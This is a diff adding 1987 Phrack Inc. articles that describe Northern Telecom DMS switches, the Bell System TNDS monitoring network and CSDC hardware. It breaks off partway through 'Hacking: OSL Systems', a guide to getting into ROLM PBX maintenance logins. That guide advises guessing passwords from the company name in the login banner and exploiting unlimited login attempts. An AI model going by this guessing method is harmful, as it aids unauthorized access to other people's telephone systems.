+need outside information (Such as Directory assistance).
+
+DMS-100/200 - Allows local and toll features described above but also includes
+a Equal Access End Office (EAEO)/Access Tandem (AT) combination.  It has the
+ability to handle up to 100,000 lines or 60,000 trunks.
+
+DMS-250 - This is a high capacity toll system for specialized common carriers
+needing tandem switching operations.
+
+DMS-300 - This is a toll system designed for international use. To my
+knowledge there are only two DMS-300 switches in use at this time.
+
+  DMS switches are divided into four "Functional" areas designed to do certain
+operations. These areas are:
+
+  1- Central Control Complex (CCC)
+  2- Network (NET)
+  3- Peripheral Modules (PM)
+  4- Maintenance and Administration (MAP)
+
+
+Here's a description of those areas.
+
+Central Control Complex
+
+Within the Central Control Complex (CCC), the main program in the switch
+controls the processing of calls, maintenance and administrative routines, and
+changes the activity for these routines to other areas of the switch. The CCC
+sends messages to the network, the maintenance and administrative areas trough
+message links and directs the functions to be run in those areas.
+
+Network
+
+The Network Modules (NMs) handle the routing of speech paths between the
+Peripheral Modules (PMs) and keep these speech connections for the rest of the
+call.  The network handles message and speech links between the PMs and the
+CCC.
+
+Maintenance and Administration
+
+Within the Maintenance and Administration includes Input/Output Controllers
+(IOCs) - IOCs interface local or remote input/output devices.  The I/O devices
+are used to do testing, maintenance, or administrative functions for the
+system.
+
+Peripheral Modules
+
+Peripheral Modules (PMs) are used as interfaces between digital carrier spans
+(DS-1), analog trunks, and subscriber lines.  The PMs are used for scanning
+lines for changes of circuit state, doing timing functions used for call
+processing, creating dial tones, sending, receiving signaling, and controlling
+information to and from the CCC, and checking the network.
+
+   Before 1984 only four types of PMs gave trunk interfaces to the DMS system;
+these include Trunk Modules (TMs), Digital Carrier Modules (DCMs), Line
+Modules (LMs), and Remote Line Modules (RLMs).  Since then ten more have been
+added, these include Digital Trunk Controller (DTC), Line Group Controller
+(LGC), Line Trunk Controller (LTC), Line Concentrating Module (LCM), Remote
+Switching Center (RSC), Remote Line Concentrating Module (RLCM), Outside Plant
+Module (OPM), Subscriber Carrier Module Rural (SCM-100R), Subscriber Carrier
+Module SLC-96 (SCM-100S), and Subscriber Carrier Module Urban (SCM-100U).
+
+Here's and explanation of those modules:
+
+Trunk Module
+
+The Trunk Module (TM) changes incoming speech into digital format, it has the
+ability to handle 30 analog trunks. The Pulse Code Modulation (PCM)
+information is combined with the trunks supervisory and control signals then
+transmitted at 2.56 Mb/s over speech links to the network.
+
+The TM also uses service circuits such as Multifrequency (MF) receivers,
+announcement trunks, and test circuits.  Each TM has the ability to interface
+30 analog trunks or service circuits to the network over one 32-channel speech
+link.  The TM is not traffic sensitive so each trunk can carry 36 CCS.
+
+Digital Carrier Module
+
+The Digital Carrier Module (DCM) gives a digital interface between the DMS
+switch and the DS-1 digital carrier.  The DS-1 signal consists of 24 voice
+channels.  The DCM takes out and puts in signaling and control information on
+the DS-1 bit streams which then makes them DS-30 32-channel speech links.  The
+DCM can interface five DS-1 lines; 5*24=120 voice channels; into four 32-
+channel speech links.  The DCM can carry a maximum of 36 CCS of traffic on
+each trunk.
+
+Line Module
+
+The Line Module (LM) gives an interface for a maximum of 640 analog lines and
+condenses the voice and signaling into two, three, or four DS-30, 32-channel
+speech links.  Four speech links have the ability to handle 3,700 Average Busy
+Season Busy Hour (ABSBH) CCS per LM.
+
+Remote Line Module
+
+The Remote Line Module (RLM) is a LM operating in a remote location from the
+DMS host.  The RLMs can be located up to 150 miles from the host office,
+depending on the transmission facilities.
+
+Digital Trunk Controller
+
+The Digital Trunk Controller (DTC) has the ability to interface 20 DS-1 lines.
+Then the DS-1 lines are linked to the network by a maximum of 16 DS-30 speech
+links; each trunk is able to handle 36 CCS.
+
+Line Group Controller
+
+The Line Group Controller (LGC) dose medium level processing tasks, with the
+ability to use host and remote subscriber line interfaces.  The LGC has the
+ability to use Line Concentrating Modules (LCMs), Remote Switching Centers
+(RSCs), Remote Line Concentrating Modules (RLCMs), and Outside Plant Modules
+(OPMs).
+
+The LGC can interface up to 20 DS-30 speech links from the LCMs or up to 20
+DS-1 links with the ability to serve RSCs, RLCMs, or OPMs.
+
+Line Trunk Controller
+
+The Line Trunk Controller (LTC) combines the DTC and LGC functions and gives a
+way to use all the equipment inside the office.  The LTC has the ability to
+handle the LCM, RSC, RLCM, OPM, and digital trunk interfaces.
+
+The LTC has the ability to give interfaces to a maximum of 20 outside ports
+from DS-30A speech links or DS-1 links to 16 network side DS-30 speech links.
+
+Line Concentrating Module
+
+The Line Concentration Module (LCM) when used with the LGC or LTC is just an
+expanded version of the line Module.  It can serve up to 640 subscriber lines
+interfaced with two to six DS-30A  speech links.  Using six speech links 5,390
+CCS can be handled per LCM.
+
+Remote Switching Center
+
+The Remote Switching Center (RSC) interfaces subscriber lines at a remote
+location to a DMS-100 host.  It has the ability to handle interface for 5,760
+lines and is used a replacements for dial offices or Private Branch Exchanges
+(PBXs).  It can handle 16,200 CCS with the use of 16 DS-1 links.
+
+The RSC consists of the following:
+
+Line Concentrator Module (LCM) - These modules do line interface function.
+They are the same as the LCMs that are used in the DMS-100 host.
+
+Remote Cluster Controller (RCC) - This controller gives DS-1/LCM interface,
+Local switching inside the remote, and Local intelligence and signaling when
+in ESA.
+
+Remote Trunking - Handles the use of RSC originating or terminating traffic
+for digital trunking off the RSC.  It can give trunking to a CDO co-located
+with the RSC or within the service range of the RSC, Private Automatic Branch
+Exchanges (PABXs), or Direct Inward Dialing (DID) trunks.
+
+Remote-off-Remote - Lets the RLCMs and OPMs connect to the RCC through DS-1
+interfaces. It lets RLCM and OPM subscribers to use the same lines to the host
+as the RSC subscribers.
+
+Emergency Stand-Alone (ESA) - If communication with the DMS-100 is lost this
+will allow you to call internal to the RSC.  It will give station-to-station
+and station-to-trunk calls for POTS, IBN, and electronic business sets.
+
+Remote Line Concentrating Module
+
+The Remote Line Concentrating Module (RLCM)  is just a LCM used is a remote
+location from the DMS-100 host.  The RLCM can handle 640 lines; this can is
+sometimes used as a replacement for CDOs or PBXs.
+
+Outside Plant Module
+
+The Outside Plant Module (OPM) is an outside plant remote unit. The OPM can
+handle 640 lines over six DS-1 links.
+
+Subscriber Carrier Module
+
+The Subscriber Carrier Module (SCM) gives a direct interface for remote
+concentrators.
+
+SCM-100R - It can interface up to five Northern Telecom DMS-1 Rural Remote
+Terminals (RTs).  A DMS-1 rural remote terminal can interface up to 256 lines.
+Communication between the RT and SCM- 100R is done through one or two span
+lines for voice and one protection line.
+
+SCM-100U - It can interface up to three DMS-1 Urban RTs.  A DMS-1 Urban can
+interface up to 576 POTS or special service lines.  Communication from the RT
+to the SCM-100U us done through a maximum of eight DS-1 links.
+
+SCM-100S - It can interface up to four Mode I (non-concentrated) SLC-96
+systems or up to six Mode II (concentrated) systems.  A SLC-96 can give
+interface for up to 96 lines.
+
+The SCM-100 takes away the need for central concentrating terminals and analog
+line circuits at the host.
+
+Operator Features
+
+With the use of DMS-200 or DMS 100/200 switch, operator features are available
+by the following:
+
+Traffic Operator Position System (TOPS)
+Operator Centralization (OC)
+Auxiliary Operator Service System (AOSS)
+
+Traffic Operator Position System (TOPS) gives many operator function on inward
+and outward calls.  The TOPS integrates the operator system with the DMS-200
+or DMS-100/200 toll switch.
+
+One voice and one data circuit are needed for each operator position.  The
+voice circuit is connected to a port of a three-port conference circuit.  The
+other two ports are connected to the calling and called parties.  The data
+circuit is used for a digital modem and is used to transmit data punched in by
+the operator to the CCC for processing.
+
+Operator Centralization
+
+Operator Centralization (OC) lets the operator use the services given by the
+DMS-200 or DMS-100/200 with TOPS.  With OC operator traffic from surrounding
+DMS sites can be routed to a central host site.
+
+
+
+
+
+                       Operator Centralization Diagram
+
+
+
+          Routing                   - - -
+         <-----\     DMS-200       | AMA |
+                \   Remote TC     / - - -
+                 = = = = = = =   /
+                | \  ----- ___|_/
+                |  \: DMS :   |
+                |   : 200 :   |                    Host TC           -----
+                |   :     :   |                = = = = = = = =     /| POS |
+                |   :  (OC:___|               |   ---------   |   / |- - -|
+                |   :     :   |\              |  : DMS-200 :  |  /  |Oper.|
+                |    -----\   | \             |  :  (TOPS) :__|_/    -----
+                 = = = = = = =   \____________|__:         :  |
+          Trib Ope Traffic->\     ____________|__:OC)      :  |
+                             \   /            |  :         :  |
+          Non-DMS Remote TC     /             |   ---------   |
+          = = = = = = = = = = =                = = = = = = = =
+         |   --------   -----  |
+         |  :  TDM   : :  (OC: |
+         |  : Switch : :     : |      -----
+         |  :        : : DMS :_|_____: AMA :
+         |  :        : : 200 : |      -----
+         |  /--------   -----\ |
+          = = = = = = = = = = =
+          /Routing             \ <-Trib Opr Traffic
+          \------->             \
+
+
+
+Auxiliary Operator Services System
+
+The Auxiliary Operator Services System (AOSS) is made to handle directory
+assistance, intercept, and that type of operator services, automatic call
+distribution, call processing, call detail recording, and operator
+administration functions for other operator services that do not need call
+completion to a called party.  AOSS position uses the same hardware as the
+TOPS links to the switch.
+
+Equal Access
+
+Equal Access (EA) is accessible through DMS switches with the addition of
+software packages.  Both Equal Access End Office (EAEO) for the DMS-100 and
+Access Tandem (AT) for the DMS-200 provide equal access features.
+
+
+
+
+                Equal Access Network Application
+
+
+
+
+                --------- __________________________________
+(Phone)--------| DMS-100 |___________                       |
+                ---------            |                      |
+           NON-EAEO                  |                      |IC/INC
+           --------               --------             /---------\   TO
+(Phone)---|        |------------| DMS-200 |------------           ---- IC/INC
+           --------              ---------             \---------/   /----->
+                                     |                      |
+                --------- ___________|                      |
+(Phone)--------| DMS-100 |__________________________________|
+                ---------
+
+
+
+DMS-100 EAEO
+
+The DMS-100 EAEO gives direct access to interLATA (Local Access and Transport
+Area) carriers Point of Presence (POP) inside the LATA.  The DMS-200 AT gives
+a traffic concentration and distribution function for interLATA traffic
+originating  or terminating inside a LATA. It allows the following:
+
+10XXX and 950-1XXX dialing
+presubscription dialing
+equal access and normal network control signaling
+Automatic Number Identification (ANI) on all calls
+custom calling services
+
+Common Channel Interoffice Signaling
+
+Common Channel Interoffice Signaling (CCIS) uses a separate data link to
+transmit signaling messages between offices for many trunks and trunk groups.
+There are two types of CCIS available in the DMS-200 or DMS-100/200, Banded
+Signaling (CCIS-BS) and Direct Signaling (CCIS-DS).
+
+CCIS-BS is for interoffice trunk signaling to give information on digits
+dialed, trunk identity, and other class and routing information.  This kind of
+trunk signaling takes less time to setup calls and put's an end to Blue
+Boxing.
+
+CCIS-DS is used to transfer call handling information past what is required
+for trunk setup.  This type of signaling lets calling card validation,
+mechanized calling card services and billed number screening to be used.
+
+Cellular Mobile Radio Service
+
+Cellular Mobile Radio Service is possible with the DMS-100 Mobile Telephone
+Exchange (MTX).  The MTX has the ability to serve from a few hundred to over
+50,000 people in up to 50 cells.
+
+Thanks to Northern Telecom and my local CO.
+
+   Control C
+      ToK!
+
+  March 1987
+ End of Part 1
+<%><%><%><%><%>
+
diff --git a/phrack12/5.txt b/phrack12/5.txt
new file mode 100644
index 0000000..39e587f
--- /dev/null
+++ b/phrack12/5.txt
@@ -0,0 +1,252 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 12, Phile #5 of 11
+
+                        THE TOTAL NETWORK DATA SYSTEM
+
+
+                               BY DOOM PROPHET
+
+
+
+
+    The Total Network Data System is a monitoring/analysis network used by
+several offices within the Telco to analyze various levels of switching
+systems in relation to maintenance, performance, and future network planning
+purposes. The systems and the offices that use them will be described in
+detail in the following text.
+
+
+    All switching entities that are in one particular serving area collect
+traffic information that is classified in three ways: peg count, overflow, and
+usage. Peg count is a count of all calls offered on a trunk group or other
+network component during the measurement interval, which is usually one hour.
+It includes calls that are blocked, which is classified as overflow traffic.
+The other measurement types that the TNDS network analyzes and collects are as
+follows:
+
+    Maintenance Usage (for 1ESS, 2ESS, 5XB, 1XB, XBT)
+
+    Incoming Usage (for 1E, 2E, 4AETS)
+
+    All trunks busy (SxS)
+
+    Last Trunks Busy (SxS)
+
+    Completions (SxS, 5XB, XBT, 1XB)
+
+    Incoming Peg Count (DMS)
+
+    Maintenance Busy Count (2E, 3E)
+
+    Detector Group Usage (SxS, 5XB, XBT, 1XB)
+
+ In ESS and DMS offices, traffic data is collected by the central processor of
+the switch. In electomechanical offices such as crossbar, a Traffic Usage
+Recorder is used to scan trunks and other components about every 100 seconds,
+counting how many are in use. This data when compiled is sent to the EADAS
+system, which is located in the Operating Company's Network Data Collection
+Centers and runs on a minicomputer. 4ESS and 4Xbar toll offices do not use
+EADAS, but their own system called the Peripheral Bus Computer for traffic
+data analysis. After receiving the traffic data from up to 80 switching
+offices, EADAS performs two basic functions:  It processes some data in near
+real time (shortly after it is received) to provide hourly and half hourly
+reports and a short term database for network administrators. It also collects
+and summarizes data that it will pass on to the other TNDS systems via data
+links or magnetic tape.
+
+    Three other systems receive directly from EADAS. These systems are ICAN,
+TDAS, and EADAS/NM. ICAN stands for Individual Circuit Analysis plan and is
+used to study individual circuits in central office equipment that have been
+specified by network administrators.
+
+    TDAS is the Traffic Data Administration System, which formats traffic data
+for use by the remaining downstream systems. ICAN and EADAS/NM are the only
+two systems with data links to EADAS that don't have their data formatted by
+TDAS before reception. TDAS is run on a mainframe in the NDCC and can be
+thought of as a distribution facility for the traffic data. EADAS/NM is used
+to watch switching systems and trunk groups designated by network managers,
+and reports existing or anticipated congestion on a display board at the
+Network Management Centers, where the system is located. Problems can be
+analyzed with this system and dealt with within a short period of time after
+they occur.
+
+    Central Office Reporting Systems
+    --------------------------------
+
+    There are five TNDS engineering and administrative systems that provide
+operating company personnel with reports about CO switching equipment. These
+are the LBS, 5XBCOER, SPCSCOER, ICAN, and SONDS. LBS, the Load Balance System,
+helps assure that the customer traffic load is uniformly distributed over each
+switching system. It minimizes congestion on the concentrators, which allow
+subscribers to share the equipment in the switch. The LBS analyzes traffic
+data coming to it from TDAS to determine the traffic load on each line group
+that the system serves. LBS generates reports used by the NMC to determine
+line groups that can have new incoming subscriber lines assigned to them. LBS
+also does a load balance indexes for the entire operating company, indicating
+how effectively each CO has avoided congestion.
+
+    Crossbar #5 Central Office Equipment Reports (5XBCOER) and Stored Program
+Control Systems COER used for 1, 2, and 3 ESS offices, analyze traffic data to
+indicate the overall service provided by the switching system and to tell how
+much of its capacity is being used. This info helps determine if new equipment
+is needed.
+
+    ICAN, which was described briefly above, detects switching system
+equipment faults by identifying abnormal load patterns on individual circuits.
+A series of reports printed at the Network Administration Center helps network
+administrators analyze individual circuit usage and verify circuit grouping.
+ICAN is located at the BOC main computer center along with 5XBCOER.
+
+    The fifth CO equipment reporting system is called the Small Office Network
+Data System, or SONDS. SONDS performs a full range of data manipulation
+functions, and is used to provide economically the full TNDS features for step
+by step offices. Step offices send data directly to this system, and it is not
+formatted by EADAS or TDAS, as it doesn't go through these systems. Weekly,
+monthly, exception and on demand reports are automatically distributed by
+SONDS to the NAC personnel.
+
+
+    Trunk Network Reporting Systems
+    -------------------------------
+
+    These systems are parts of the TNDS used by the Circuit Administration
+Center to support trunk servicing and forecasting. The Trunk Servicing System
+helps trunk administrators develop short term plans to make the best use of
+the trunks that are already in use. It receives and processes data received
+from TDAS and computes offered load. Offered load is the amount of traffic a
+trunk group would have carried had the number of circuits been large enough to
+handle the load without trunk blocking (giving the caller a re-order or all
+circuits busy recording). TSS produces weekly reports showing underutilization
+of trunks and below grade of service trunk groups which do not have enough
+trunks in them. The CAC uses these reports to add or disconnect trunks
+according to what traffic requirements exist.
+
+    The Traffic Routing and Forecasting System, replacing the Trunk
+Forecasting System, forecasts message trunk requirements for the next five
+years. Major conversions and similar network changes are all taken into
+consideration when determining the future traffic needs. TRFS receives data
+from EADAS, TDAS, and TSS and is located at the Operating Company computer
+center.
+
+
+    Since TDAS and some of the downstream TNDS systems need much of the same
+information, that information is maintained in a system called Common Update.
+In this manner, some data does not have to be duplicated in each individual
+system. Some of the information includes the configuration of switching
+equipment and the trunk network and specifications on traffic registers for
+central offices. Numbers recorded by each register are treated consistently by
+each system that uses the Common Update data base. There is an update base for
+trunking, referred to as CU/TK, and an update on equipment known as CU/EQ. The
+trunking part of the Operating Company's data base is coordinated by the Trunk
+Records Management System.
+
+    Since the TNDS systems are so important to the proper operation of the
+network, the CSAR (Centralized System For Analysis and Reporting) is used to
+monitor the entire TNDS performance. The NDCC, the NAC, and the CAC are
+provided with measurements of the accuracy, timeliness, and completeness of
+the data flow through TNDS from beginning to end. It doesn't analyze data from
+EADAS/NM, SONDS, or TRFS.
+
+
+
+
+    BOC Operations Centers
+    ----------------------
+
+    NAC-Network Administration Center. Responsible for optimum loading, and
+utilization of installed COE. Performs daily surveillance of COs and trunk
+groups to ensure service objectives are being met. The NAC Reviews profiles of
+office load relating to anticipated growth. They work with NSEC to initiate
+work orders to increase equipment in use. The systems they use are EADAS,
+SPCSCOER, CSAR, and SONDS.
+
+   NMC-Network Management Centers. The NMC keeps the network operating
+efficiently when unusual traffic patterns or equipment failures would
+otherwise result in congestion. The NMC analyzes network performance and
+prepares contingency plans for peak days, telethons, and major switch
+failures. They monitor a near real time network performance data to identify
+abnormal situations. The system they use is EADAS/NM.
+
+    CAC-Circuit Administration Center. The CAC ensures that in service trunks
+meet current as well as anticipated customer demands at acceptable levels of
+service. For planned servicing, the CAC compares current traffic loads with
+forecasted loads for the upcoming  busy season. If the loads are consistent,
+the CAC issues the orders to provide the forecasted trunks. When
+inconsistencies occur, they examine the variation, develop modified forecasts,
+and issue orders based on the new forecast. They review weekly traffic data to
+identify trunk groups that need additions and issue the necessary trunk
+orders. The systems they use are TSS, TRFS, and CSAR.
+
+    NSEC-Network Switching Engineering Center. They plan and design the
+network along with the CAC. NSEC develops a forecast of loads for traffic
+sensitive switching equipment, sets office capacities, and determines relief
+size and timing.
+
+
+    For long range planning, the following offices are utilized.
+
+    TNPC-Traffic Network Planning Center. The TNPC determines the most
+economic growth and replacement strategies. They handle future network
+considerations over a 20 year period for tandem systems, operator services
+networks, interconnecting trunks, and switching terminations to accommodate
+the trunks.
+
+    WCPC-Wire Center Planning Center. This office does the same as the TNPC,
+but their jurisdiction includes local switches, the subscriber network, and
+interoffice facilities. They have the numbers, types, and locations of
+switches and homing arrangements. They also keep track of alternate routes,
+tandem centers, etc. Both the TNPC and WCPC provide the CAC and NSEC with
+office and network evolution plans for 20 years.
+
+
+    District based maintenance and administration operations are handled by
+the NAC, RCMAC, and the SCC. These can cover 240 square miles of serving area.
+
+
+    Network Operations Centers
+    --------------------------
+
+    The highest level of network operations is the Network Operations Center,
+located in the AT&T Long Lines HQ in Bedminster, NJ. The main computers used
+by the NOC are in Netcong, about 25 miles away, along with some backups. The
+NOC are responsible for interregional coordination between the 12 RNOCs, 27
+NMCs, and 2 RNMCs in Canada; for monitoring the top portion of toll switches
+(all class 1 Regional Centers, 2 Canadian, about 70 class 2 Sectional Centers,
+200 Primary centers, some class 4 Toll centers); for monitoring of the
+international gateways, and the CCIS network for these switching systems. The
+STP signalling links connect STPs to each other, to switches, and to a
+centralized database called an NCP (Network Control Point) of which access is
+given to switches directly via CCIS.
+
+The Data Transfer Point, which is a data switch that furnishes the NOC with a
+flow of monitoring information for all key toll switches, also gives them
+information about CCIS STPs and the IOCCs that they monitor.
+
+    The operating system supporting the NOC is the NOCS (the S being System),
+which is configured with the DTP, a wall display processor, graphics
+processors, receive only printers, and CRT terminals for the technicians. The
+NOC also uses EADAS/NM through the DTP. Both the NOCS and the DTP run Unix
+operating systems.
+
+
+    The second highest level of these operations centers are the RNOCs, or
+Regional Network Operations Centers. The 12 RNOCs monitor the CCIS network and
+coordinate the 2-3 NMC's activities for its region. The RNOCs use the EADAS/NM
+system and something called NORGEN, Network Operations Report Generator, that
+prints out reports from EADAS's traffic data.
+
+    The first or lowest level of these centers is the Network Management
+Centers. There were 27 EADAS/NM supported NMCs across the United States as of
+1983. The NMC was described above, as well as the systems it used.
+
+
+==============================================================================
+
+    Some of this information was taken from Bell System publications and from
+trashed materials, and may not be the same for every area. All material is
+correct to the best of the author's knowledge. Thanks to The Marauder for
+supplying some information. This file was written for educational purposes
+only.
+
+-End Of File-
diff --git a/phrack12/6.txt b/phrack12/6.txt
new file mode 100644
index 0000000..39a9c35
--- /dev/null
+++ b/phrack12/6.txt
@@ -0,0 +1,157 @@
+                             Written March, 1987
+
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 12, Phile #6 of 11
+
+               /\                                            /\
+              <[]>==========================================<[]>
+               \/            ^                 ^             \/
+               || PLP       [+]The Executioner[+]        PLP ||
+               ++         ^                       ^          ++
+               ||        [+] PhoneLine Phantoms! [+]         ||
+               ++                                            ++
+               ||       CSDC - Hardware  Requirements        ||
+               ++       -----------------------------        ++
+               || PLP   | PHRACK XII  -  PHRACK XII |    PLP ||
+               /\       -----------------------------        /\
+              <[]>==========================================<[]>
+               \/   Phreak Klass Room 2600 =  806-799-0016   \/
+               ||  _______________            Login: Educate ||
+               ++  |The only BBS |      Sysop:Egyptian Lover ++
+               ||  |that teaches.|    Cosysop:The Executioner||
+               /\  --------------- Board lose:Oryan Quest    /\
+              <[]>==========================================<[]>
+               \/                                            \/
+
+Preface:
+========
+
+     This is the second part of my CSDC (Circuit Switched Digital Capability)
+series, the first being in PHRACK X. It is suggested that you read the first
+part and also the file on PACT in PHRACK XI. If I feel the material was not
+covered completely, I will make a third addition to this file.
+
+
+Hardware Interfaces
+===================
+
+     A NCTE or equivalent network interface equipment, located on the customer
+premises, is required to provide the CSDC feature for a customer. The NCTE or
+an equivalent circuit, located on the customer's premises, is required to
+provide TCM (Time-Compression-Multiplexing) transmission on the 2-wire
+subscriber loop. The NCTE also has a remote loopback for testing from CSDC
+central office.
+     Dedicated 2-way CSDC trunk circuits are provided via DCT (Digital Carrier
+Trunk) combined alternate data/voice (CADV) units with DCT supervision. MF and
+CCIS signalling is allowed on these trunks. They provide signalling, switching
+and trunking functions between 1A ESS switch and other CSDC offices. To
+provide CSDC, the DCT bank must be equipped with alarm and digroup control
+units. A Digital Office Timing Supply (DOTS) is needed to provide network
+synchronization for the CSDC feature. A minimum of 3 CSDC maintenance circuits
+are needed for the CSDC feature to operate. The circuit provides digital
+signals for testing CSDC trunks and loops. They also provide a test
+termination for incoming CSDC calls. If an office has superimposed ringing for
+4 and 8 party lines, these ringing circuits may be used for loop testing with
+the maintenance circuit.
+
+Remote Switching System
+=======================
+The RSS remote frame contains eight special service slot positions that can be
+used for D4 type plug in units (basically allows the RSS to have CSDC
+abilities). This allows the CSDC TRXS (Time Compression Multiplexing Remote
+Subscriber Exchange) channel units to be housed in the RSS frame. The CSDC
+feature is provided via the RSS T1 carrier facilities. The T1 carriers for
+CSDC service terminate with position 1 and 0 at the RSS. A ringing and tone
+plant is required in the RSS office to ring the phones of special service
+channel unit subscribers.
+
+
+Operation of the CSDC
+=====================
+
+     An off-hook origination initiates the seizure of an originating register.
+A line translation is performed and the CSDC indicator is received from the
+Line Equipment Number Class (LENCL) and is stored in the register. A touch
+tone service receiver is connected to the line and dial tone is applied. Upon
+receiving a digit, dial tone is removed. If the first digit is a '#', digit
+collection is set up to collect 2 more digits. Upon receipt of the 2 digits
+(99), the PACT (Prefix Access Code Translator) is indexed via the dialed
+digits to determine what service has been requested. If the line cannot have
+CSDC, an error message is sent. The AB digits (carrier selection) are
+collected next. Once the AB digits have been determined to be valid, the CCOL
+(Chart Column) is received. The CCOL merely is a code to tell the PACT what is
+to be done. Once the AB digits and the CSDC CCOL is received, the original
+register is overwritten with the CSDC CCOL. The CSDC office then sends a bit
+down the line to tell the equipment that a CSDC call is being processed.
+     The call is now reinitialized to appear as though no digits have been
+collected. Digit collection proceeds until the proper number of digits (7 to
+10) has been received. An AMA register is seized at the end of the dialing.
+The call is then routed according to the dialed digits on a CSDC outgoing
+trunk. Answer guard timing for CSDC calls is 800 ms. Upon answer, the answer
+time is recorded in the AMA register.
+     An outpulsing trunk is seized and a POB is hunted. If an outgoing trunk
+and outpulsing device are needed, one will be hunted. Information on the trunk
+is stored and a transfer to the outpulsing routine (MF or CCIS) is done. A
+verification insures that both calling and called parties are CSDC allowed. If
+they are not, the call is routed to an Automatic Intercept Service (AIS).
+     For MF outpulsing, a junior register is seized, the outgoing trunk is put
+into the proper states, and start pulsing signal detection is done followed by
+digit outpulsing. For CCIS, call processing is the same as a normal call but a
+CCIS continuity check is performed while on the on-hook state.
+     For an incoming call, the CSDC bit from the Trunk Class Code (TCC) is
+stored in the incoming register and a CSDC count is pegged. Digit collection
+is performed and a terminating DN translation is performed. Ringing is applied
+normally and once it has been answered, the incoming trunk is put in the
+off-hook state to pass answer to the next office.
+     Standard disconnect and trunk guard timing is performed on CSDC calls
+when the called or calling party goes off-hook after a talking path has been
+established.
+
+
+Standard CSDC Dynamics
+======================
+
+Call forwarding codes dialed after the CSDC code result in reorder.
+
+The Call waiting option is also suspended when a CSDC call is in progress.
+Busy tone is given to POTS call that terminates to a CSDC connection. Busy
+tone is also given to a calling CSDC party if it encounters a busy line.
+
+In order to have a 800 CSDC feature, the office must have CCIS INWATS ability
+in the OSO (Originating Screening Office).
+
+Dialing 911 after the CSDC code is allowed, but 411/611 calls are routed to
+error messages.
+
+
+NCTE (Network Channel Terminating Equipment)
+============================================
+
+As covered in Part 1, the NCTE is the equipment that you need to have CSDC.
+The NCTE is a piece of hardware that is connected to the CO loop and a
+terminal. On the terminal, there are 8 jacks for 8 pins on the NCTE. The
+functions of each pin are as followed.
+
+     1 - TRANSMISSION DATA
+     2 - TRANSMISSION DATA
+     3 - MODE CONTROL
+     4 - MODE CONTROL
+     5 - TIP VOICE
+     6 - RING VOICE
+     7 - RECEIVED DATA
+     8 - RECEIVED DATA
+
+==============================================================================
+
+
+This ends PART II of the CSDC series. Since Taran King was in such a hurry, I
+will finish the 3rd file with SCCS integrations, loop structure and RSS
+structures.
+
+If you have any questions about this file or any other file, please leave me a
+message on either...
+
+Phreak KlassRoom 2600 = 806-799-0016  LOGIN:EDUCATE
+
+My Voice Mail Box     = 214-733-5283
diff --git a/phrack12/7.txt b/phrack12/7.txt
new file mode 100644
index 0000000..fe5cec8
--- /dev/null
+++ b/phrack12/7.txt
@@ -0,0 +1,209 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 12, Phile #7 of 11
+
+                    -/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
+                    \                                   /
+                    /       Hacking : OSL Systems       \
+                    \                                   /
+                    /        Written by Evil Jay        \
+                    \                                   /
+                    /       (C) 1987/88  Evil Jay       \
+                    \                                   /
+                    -/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
+
+
+
+   Prologue:
+
+
+    This file is for all those people who are running across the OSL system
+   and are constantly confused about getting in and what to do once you're in.
+   Because of the trouble I had getting a manual on the system from ROLM, I
+   was forced to write this file from what I already know, and what I can do
+   on the few systems I have gained access to. Since this file is far from
+   complete (without a manual, most are), I'll leave it to you, to write up
+   future files on the OSL system. Credit goes to Taran King who got me
+   interested in writing the file, and who tried to help me get a manual (my
+   social engineering leaves something to be desired).
+
+
+    What is OSL:
+
+     Actually it has been termed as Operating Systems Location, Off Site
+    Location and a lot of other names. Which? I'm not sure. What I can tell
+    you is that it's an operating system running on an IBM (?) that does
+    remote maintenance operations on a ROLM PBX (Referred to as CBX I
+    believe). As I said, this file is not too complete, and I was unable to
+    get very much information about the system, or the PBX system itself. I
+    believe Celtic Phrost wrote a file on ROLM PBX systems, and you might want
+    to read that or other ROLM files for more information.
+
+
+
+    Getting In:
+
+      If you have trouble logging in, try changing your parity. Also, this
+    system will only except uppercase. The first thing you should see when you
+    get a carrier is the following:
+
+
+
+MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
+RELEASE 8003
+OSL, PLEASE.
+?
+
+
+      MARAUDER10292 is the system identification. Most of the time, this will
+    be the name of the company running the OSL system, but occasionally you
+    will find a system, you will not be able to identify. CN/A it. It might be
+    your only chance of gaining access to that particular system.
+
+      01/09/85. This is a mystery to me. It could be the time that the system
+    first went up (but sounds unlikely), the date of the current version of
+    the OSL operating system...etc.
+
+      The ^G is a Control-G, and rings a bell at your terminal. I do not know
+    why, but it does...
+
+      The rest of the text on that line is the current time and date.
+
+      RELEASE 8003 could be, again, the revision number of the software
+    package. I don't know.
+
+      OSL PLEASE means that you can now attempt to login.
+
+      The ? is your prompt. Remember the uppercase only. Naturally we are
+    going to type "OSL" to login. Once this is done, we will receive this
+    prompt:
+
+KEY:
+
+      This is the password prompt, and so far as I can tell, can be anything
+    up to, say, 20 characters long. Obviously we are going to try MARAUDERS or
+    MARAUDER as a password. Here's the tricky part. Some systems do not tell
+    you whether the password was right or not. Sometimes, if it's right, you
+    will get a ? prompt again. If not, you will get an ERROR msg. It depends
+    on the system. Each system is set up a different way. Also, some systems
+    require all alphabetics, while others require alphanumerics and sometimes
+    they will require both. Again, you may or may not get an ERROR message.
+    You can ABORT anything at any time by sending a BREAK. One good thing
+    about the system is that you have, so far as I can tell, unlimited
+    attempts at guessing the "KEY". Also, Druidic Death says that "," is a
+    default, or is commonly used (I don't remember which). Unfortunately, I
+    have never been able to get this to work myself.
+
+
+    Your IN!:
+
+      Okay, first thing we need to do is type HELP. If you have access, which
+    again, differs from system to system, you will get a menu that looks like
+    so. (Maybe not, but I am through telling you how strange this system is.)
+
+
+
+PLEASE ENTER ONE OF THE FOLLOWING COMMANDS
+
+LREP - DISPLAY REPORT MENU
+LST  - LIST REPORT COMMANDS CURRENTLY STORED
+ACD  - ADD AN ACD COMMAND
+DEL  - DELETE AN ACD COMMAND
+MOD  - MODIFY AN ACD COMMAND
+SUS  - SUSPEND AN ACD COMMAND
+ACT  - ACTIVATE AN ACD COMMAND
+
+
+    LREP: This lists a menu of reports you can view.
+
+    LST : This lists all the commands that have been stored in the buffer.
+
+    ACD : This activates a command.
+
+    DEL : This deletes a command in the buffer.
+
+    MOD : This modifies a command in the buffer.
+
